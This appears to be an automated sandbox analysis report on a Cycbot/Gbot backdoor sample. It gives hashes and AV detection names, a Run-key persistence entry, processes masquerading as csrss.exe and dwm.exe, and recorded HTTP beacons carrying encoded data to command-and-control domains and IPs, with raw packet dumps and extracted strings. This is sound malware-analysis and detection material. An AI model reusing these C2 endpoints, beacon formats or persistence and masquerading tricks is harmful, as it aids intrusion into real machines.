Analysis Date2014-08-17 11:29:04
MD5a4eedc21f929ec2240d737184e6298e6
SHA14385677d8ca561128f6564531742ddc2d188303e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 66c6f59007e8b567a3815021f17ea952 sha1: bfc5670ad59bebb44d30ff3bc88b9d5ca2abdc49 size: 94720
Section.rdata md5: f9dc290e3f94a9d46421ea4682f69e90 sha1: c3e7d7d590c6ca6618af61cff40a62409520ec73 size: 1536
Section.data md5: 0749533ef65a785cd5eea6a888cb37e3 sha1: 79d0527b4699fd936333b688cd08e8e019970fb9 size: 80384
Section.reloc md5: 1ee72c8fd01847e3ba0c1e0793691be1 sha1: e88a882a5f51e20ea2b3856b6df71a80092b61c7 size: 1024
Timestamp2005-11-21 11:15:38
PEhashf296a9095369ccf1d7761de3db87eb9b243bf51e
IMPhashe048dc8f78dab5a5fbb34e4b57d5f053
AV360 SafeTrojan.Generic.KD.367550
AVAd-AwareTrojan.Generic.KD.367550
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1130
AVDr. WebBackDoor.Gbot.73
AVEmsisoftTrojan.Generic.KD.367550
AVEset (nod32)Win32/Kryptik.THG
AVFortinetW32/FakeAV.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Trojan.Generic.KD.367550
AVNormanwin32/Cycbot.EI
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.Backdoor.Cycbot.2921
AVYara APTno_virus
AVZillya!Trojan.Menti.Win32.10748

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSfreshmediaportal.com
Winsock DNSresetmymemory.com
Winsock DNS127.0.0.1
Winsock DNSrealsoftwaredevelopment.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrealsoftwaredevelopment.com
Type: A
104.28.9.83
DNSrealsoftwaredevelopment.com
Type: A
104.28.8.83
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSresetmymemory.com
Type: A
192.155.89.148
DNSworldmotoblo.com
Type: A
DNSfreshmediaportal.com
Type: A
HTTP GEThttp://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v65=75&tq=gKZEtzy7A%2FM6iE8u5fLgBs1vuhnlsEhNrbfJbk4f0HGU6JH8%2FCDQpRwB1OSM8AmP2RBb8%2B1KST0TkX4bQEhOl6gvqzVsj602PYtP1PMlhLeepWV00LtD9NQgV53tnYTqAarOPAGXpYLePunu0BvW60H99GC2SEKUR9DAQ3rIygF6hH2yXMvwjWMuqD8wsljcIr8MCdDiFNSbkKKnlW04AaoakZuC7jkpvLfbtaVKpF7pidq2nGHXaqjp0ugVJmWkNE0UYXrrmyHLipfHkEw14tFEhsaQdVA0rADgL6LrF6AqsXyBk435iLWTz6jcAasCQmUmOt%2ByNHstJNoNvKkMgsd9y
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GEThttp://resetmymemory.com/blog/images/3521.jpg?v78=22&tq=gKZEtzyMv5rJqxG1J42pzMffBfUq1ujbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 104.28.9.83:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 36353d37   humb_1.gif?v65=7
0x00000030 (00048)   35267471 3d674b5a 45747a79 37412532   5&tq=gKZEtzy7A%2
0x00000040 (00064)   464d3669 45387535 664c6742 73317675   FM6iE8u5fLgBs1vu
0x00000050 (00080)   686e6c73 45684e72 62664a62 6b346630   hnlsEhNrbfJbk4f0
0x00000060 (00096)   48475536 4a483825 32464344 51705277   HGU6JH8%2FCDQpRw
0x00000070 (00112)   42314f53 4d38416d 50325242 62382532   B1OSM8AmP2RBb8%2
0x00000080 (00128)   42314b53 5430546b 58346251 45684f6c   B1KST0TkX4bQEhOl
0x00000090 (00144)   36677671 7a56736a 36303250 59745031   6gvqzVsj602PYtP1
0x000000a0 (00160)   504d6c68 4c656570 57563030 4c744439   PMlhLeepWV00LtD9
0x000000b0 (00176)   4e516756 3533746e 59547141 61724f50   NQgV53tnYTqAarOP
0x000000c0 (00192)   41475870 594c6550 756e7530 42765736   AGXpYLePunu0BvW6
0x000000d0 (00208)   30483939 47433253 454b5552 39444151   0H99GC2SEKUR9DAQ
0x000000e0 (00224)   33724979 67463668 48327958 4d76776a   3rIygF6hH2yXMvwj
0x000000f0 (00240)   574d7571 44387773 6c6a6349 72384d43   WMuqD8wsljcIr8MC
0x00000100 (00256)   64446946 4e53626b 4b4b6e6c 57303441   dDiFNSbkKKnlW04A
0x00000110 (00272)   616f616b 5a754337 6a6b7076 4c666274   aoakZuC7jkpvLfbt
0x00000120 (00288)   61564b70 46377069 6471326e 47485861   aVKpF7pidq2nGHXa
0x00000130 (00304)   716a7030 7567564a 6d576b4e 45305559   qjp0ugVJmWkNE0UY
0x00000140 (00320)   5872726d 79484c69 7066486b 45773134   XrrmyHLipfHkEw14
0x00000150 (00336)   74464568 73615164 56413072 4144674c   tFEhsaQdVA0rADgL
0x00000160 (00352)   364c7246 36417173 5879426b 34333569   6LrF6AqsXyBk435i
0x00000170 (00368)   4c57547a 366a6341 61734351 6d556d4f   LWTz6jcAasCQmUmO
0x00000180 (00384)   74253242 794e4873 744a4e6f 4e764b6b   t%2ByNHstJNoNvKk
0x00000190 (00400)   4d677364 39792048 5454502f 312e300d   Mgsd9y HTTP/1.0.
0x000001a0 (00416)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000001b0 (00432)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x000001c0 (00448)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x000001d0 (00464)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x000001e0 (00480)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001f0 (00496)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a6b4e 45305559    close....kNE0UY
0x00000140 (00320)   5872726d 79484c69 7066486b 45773134   XrrmyHLipfHkEw14
0x00000150 (00336)   74464568 73615164 56413072 4144674c   tFEhsaQdVA0rADgL
0x00000160 (00352)   364c7246 36417173 5879426b 34333569   6LrF6AqsXyBk435i
0x00000170 (00368)   4c57547a 366a6341 61734351 6d556d4f   LWTz6jcAasCQmUmO
0x00000180 (00384)   74253242 794e4873 744a4e6f 4e764b6b   t%2ByNHstJNoNvKk
0x00000190 (00400)   4d677364 39792048 5454502f 312e300d   Mgsd9y HTTP/1.0.
0x000001a0 (00416)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000001b0 (00432)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x000001c0 (00448)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x000001d0 (00464)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x000001e0 (00480)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001f0 (00496)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7637 383d3232   /3521.jpg?v78=22
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42665571   qxG1J42pzMffBfUq
0x00000040 (00064)   31756a62 77766753 39313757 3635724a   1ujbwvgS917W65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   72657365 746d796d 656d6f72 792e636f   resetmymemory.co
0x00000090 (00144)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000a0 (00160)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000b0 (00176)   6c6c612f 322e300d 0a0d0a6d 65210a20   lla/2.0....me!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a6b4e 45305559   </html>...kNE0UY
0x00000140 (00320)   5872726d 79484c69 7066486b 45773134   XrrmyHLipfHkEw14
0x00000150 (00336)   74464568 73615164 56413072 4144674c   tFEhsaQdVA0rADgL
0x00000160 (00352)   364c7246 36417173 5879426b 34333569   6LrF6AqsXyBk435i
0x00000170 (00368)   4c57547a 366a6341 61734351 6d556d4f   LWTz6jcAasCQmUmO
0x00000180 (00384)   74253242 794e4873 744a4e6f 4e764b6b   t%2ByNHstJNoNvKk
0x00000190 (00400)   4d677364 39792048 5454502f 312e300d   Mgsd9y HTTP/1.0.
0x000001a0 (00416)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000001b0 (00432)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x000001c0 (00448)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x000001d0 (00464)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x000001e0 (00480)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001f0 (00496)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a 3c2f626f 64793e0a   lose....</body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a6b4e 45305559   </html>...kNE0UY
0x00000140 (00320)   5872726d 79484c69 7066486b 45773134   XrrmyHLipfHkEw14
0x00000150 (00336)   74464568 73615164 56413072 4144674c   tFEhsaQdVA0rADgL
0x00000160 (00352)   364c7246 36417173 5879426b 34333569   6LrF6AqsXyBk435i
0x00000170 (00368)   4c57547a 366a6341 61734351 6d556d4f   LWTz6jcAasCQmUmO
0x00000180 (00384)   74253242 794e4873 744a4e6f 4e764b6b   t%2ByNHstJNoNvKk
0x00000190 (00400)   4d677364 39792048 5454502f 312e300d   Mgsd9y HTTP/1.0.
0x000001a0 (00416)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000001b0 (00432)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x000001c0 (00448)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x000001d0 (00464)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x000001e0 (00480)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001f0 (00496)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615325   OQij%2B82uYvEaS%
0x000000c0 (00192)   32465425 32427371 4e537225 32466525   2FT%2BsqNSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
@
/
@
...
X
. 
A
.4
|.
..R

((((
080904b0
1.0.0.1
2102
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
=======}}!!!
>>>>>>
>>>>>>>
         
 "`@, 
______
____________
______________
,,,,,,,
,,,,,,,,,,,,{{*;;;
;;;;;;;;
;;;;;;;;;;
;;!!!!!
:::::::::::::::::::::;;;;;;;;;;;;;;;;
!!!!!!!
......||||||||||||
...........}
''''''
(((!!!!
(((((((
((((((((
((((((((((//>
((((((((((((
)<)<?<)<?
))))))
)#|	% 
[[[[[[[[[[[[
]]_____
]]]]]]]]]]
{{{{{{{{
}}}}}}}}--------
}}}}}}}}}}}}}}}}
$$$$$$
$$$$$$$$$
$#	/_= 
\\\\\\\\\\\\\\\
##########
++++++
								
											
0000000
00000000
00000000000
0zd!`)n
/1111111111111
]11&;!79
 1j})p
1p1V+5=
1ybGGcu
222222222222
2222222CCCCCC7
22FFFFFF
  2	ECk
(2t3hw
2,`@y*@
@3p~i6
3`R`~}ge
	3@[U_
3-ZlpC?
47`Zf#
`?@4^	a
]4b;# 
4i}VIk9Z.
4u2]x&m/
=4w=;dz
5555555
` 5{E|
|5oG~2
66llll&&@@lllll
66Ut+k
6A,<'|?
6{<o%0L
6q@Rcx
6wx@Q{
7>BC, @[YI
)\7V/V
7_/Zn"
((((((((((((((((8
8("g^K
8wHItwMI
99999----__}}}}}}
99999999999
9999999999999*888888888888
999999999999999999999
9999eeee
!%;9A$
%>9Gsn$
9N7$ `
+A(@`}
a0`J0I\L
A'75q}
AAAEEEE
AAMMMM
Ac0L01c
A:c)Ly7
^a#[DY
#|A|e-
aEuqpa
aI%*|-
@`}aK0
a\-lg$
a'n[l"U
A~.v|C
AvT'-[
B.`@"`
B*:!=$~
%B<6ki$
@@]ba.`
bbbbbbbbb33333
BBBBBBBBBBBBB
bbbbbbbbbbbbbbbbbb:
BBBBBBBBBBBBU
bbbbbbbN
bbbbb:::::::FFFF
bbGGGGGGGGGGGGGGGGGGG
BBppppppp,
bDN0H@
BeO_ch
\bi+}cn[
Bl4Lh`
%"BMbI:
bmEh_VI
bm`ZkB
?B.pMA
BrLO3_
BS{	* 
b(@ WX
bxb%$M"
-BY\t]
CCCCCC
CCCCCCCCC
cccMMMM
cU?>[!
cu<Mx-
D?" `]
\D4+}O
$d7$PpA
@.data
DDDDDD
ddddddd
DeleteFileW
@DL>AFE
@ D:@P
~d*Qtp
DX@@@X
DZl?wwa
 *'@E.
\E>0At
E (D>e
ee4444444444444
eeeeeeeee
EEEEEEEEEEhhhhhhhhhPPPP???l99
E-n,}oL
EnumResourceNamesW
@`etB~=
(@@==F
F\}&0gA]
@ f6nE8
fa)/B0,z
fBsl7E*
#fC+9i:
FFFaaa<
fffffff0
fffffffffffff
FFFFFFFFFFFPPP
fffVVVVVVVVVVVVVVV
FF^}vw
FHB||E
fIIIIIIIIIIIIIIIoooohh
FindClose
FindFirstFileW
FindNextFileW
FlushInstructionCache
f_'`O|v
FPT<~e
FreeLibrary
f}wz  
$@ Gd:_;
~g,@ E
GetExitCodeProcess
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetModuleHandleW
GetPrivateProfileStringW
GetProcAddress
GetWindowsDirectoryW
G~frm}*
 @G!G-
GGGGGGG
-GHhuU
GlobalAlloc
GlobalFree
:GlXI%
gn{K}x
/G'?u2
*)&gx1
gZ^+mb
h ``^"
 @H,  
hbhKQH
_HC}Mn
,H/CT@
HIQ("|
_h\(@`JL
HKa(r%
&_Hlgg:B
 hO*2"
h]S/("
@-!hu.
@HXqDG8
iB	L<#
)iCI/j
Ick+Pv
Ih7dHddb
i"h8h"h8h"
iIfmC6n
IIIIII
IIIIIII
iiiiiiiii
IIIIIIIIIIII
IIIIIIIIIIuuuuuuuuuu%%%%
i)OgC&
ipGlSn
  I~qa
;i=S'6
@ J@='
J6jIC1m
J_~d^,C6
jgggggtt
JIQ* `
JJ\\\\\\\\\\\\\\
^^jjjjjjj
JJJJJJJJ
jjjjjjjjjjjj
` |j#K
jKIAeg
jLo# ?Oy
JnXhLX
j|RW?5d
@`jt~s
[K&`@ 
K/^( @
k03^(@
k0zzzzzzz
k']2B)
K&Aa'uM
	kDU$@`
KERNEL32.dll
kfJX&@
k|,` G0
K?g3zB
kkkkk(((
KKKKKKKK
KKKKKKKKKKKKKKKKKK
%K=kun
Kt3]OKsDuk
l@@^  @
`=L-<`
/l0	 `
  lAdQ#
L,c'\P
l+/gv0j
lIGyE%
LMlo5p
L|n%(r>?2
LoadLibraryExW
l.>(^q
ltvWYW
Lvvvvv
;lxERso
m2GtiJ8
M40&@@
?m8e:a1
M~$ @g
M:K>M7
mK(@@ZY
mm...........
.M&_m`}
;;;;MMMMMMM
MMMMMMMMMMMMMMMMMMMMM
MMMn444444444444444
m`Sn1z4
MulDiv
MultiByteToWideChar
,,mwn6@
Mya?@'
	NAtpUe
NdrComplexArrayFree
NNNNNNN
o8;$u%^
oft.co
#OJ27#->v
ooo77<
ooooooo
OOOOOOOOOOOO
